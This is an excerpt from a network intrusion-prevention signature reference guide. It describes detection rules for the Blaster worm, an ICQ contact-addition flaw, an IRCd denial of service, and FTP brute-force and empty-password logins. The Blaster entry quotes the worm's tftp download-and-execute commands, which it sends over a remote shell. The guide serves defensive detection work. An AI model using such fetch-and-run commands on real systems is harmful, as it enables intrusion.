TMS zl Module IPS/IDS Signature Reference Guide RLX.10.2.2.94

Signature Description: The Blaster worm propagates via the Microsoft Windows DCOM RPC Interface Buffer
Overrun Vulnerability. The worm opens a command shell on the victim host on TCP port 4444. It issues the commands
"tftp <host> GET msblast.exe" and "start msblast.exe" over the command shell. The command shell is closed once the
attacking host disconnects.
A Windows Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) interface in Microsoft Windows
NT 4.0, 2000, XP, and Server 2003 is vulnerable to a buffer overflow condition. Successful exploitation of the
vulnerability could allow execution of arbitrary code with SYSTEM privileges.
Signature ID: 10190
CHAT ICQ forced user addition Vulnerability
Threat Level: Information
Industry ID: CVE-2001-1305
Bugtraq: 3226
Signature Description: ICQ is an instant messaging application from Mirabilis. A web server can force the addition of
arbitrary ICQ UINs to a target user's ICQ contact list if the user is running ICQ and browsing with Microsoft Internet
Explorer. This is due to the way Internet Explorer and ICQ handle data returned from a web server with an
'application/x-icq' Content-Type. In more recent versions of the ICQ client, the user is prompted before a contact is
added to the list. The vulnerable platform is ICQ 2000.
Signature ID: 10193
Chat IRC channel join DoS
Threat Level: Information
Signature Description: IRCd (the Internet Relay Chat daemon) versions 2.10 through 2.10.3p3 are vulnerable to a denial
of service attack caused by a buffer overflow in m_join in channel.c. This rule detects attempts to exploit this buffer
overflow vulnerability.
Signature ID: 10213
Connection Closed Message from Source Port 80
Threat Level: Information
Signature Description: This rule triggers when a 'Connection closed by foreign host' message comes from a host on the
external network that initiated the connection from source port 80. Because the external side is using source port 80
for an outbound connection, this is unusual behavior. An attacker may use port 80 on the external machine to initiate
a connection to a machine on the protected network in an attempt to bypass firewall protection.
Signature ID: 10214
FTP - Multiple bad Login attempts
Threat Level: Critical
Signature Description: Attackers may continuously attempt to gain access to FTP servers by guessing different
usernames and passwords. The server sends an error response for each login failure. This signature generates an alert
message if six such failure responses are generated by the server within 20 seconds. The administrator should monitor
such attempts and take appropriate action.
Signature ID: 10215
FTP - Access using empty Password
Threat Level: Warning
Industry ID: CVE-2001-1424
Bugtraq: 2568
Signature Description: FTP servers contain null or default passwords when shipped. This allows attackers to conduct
unauthorized activities. This signature raises an event whenever an FTP PASS command is received with an empty (null)
password. This could permit a user to reconfigure the unit, or to set the password and prevent the device from being
reconfigured.
This vulnerability allows the attacker to browse the file structure of the affected device.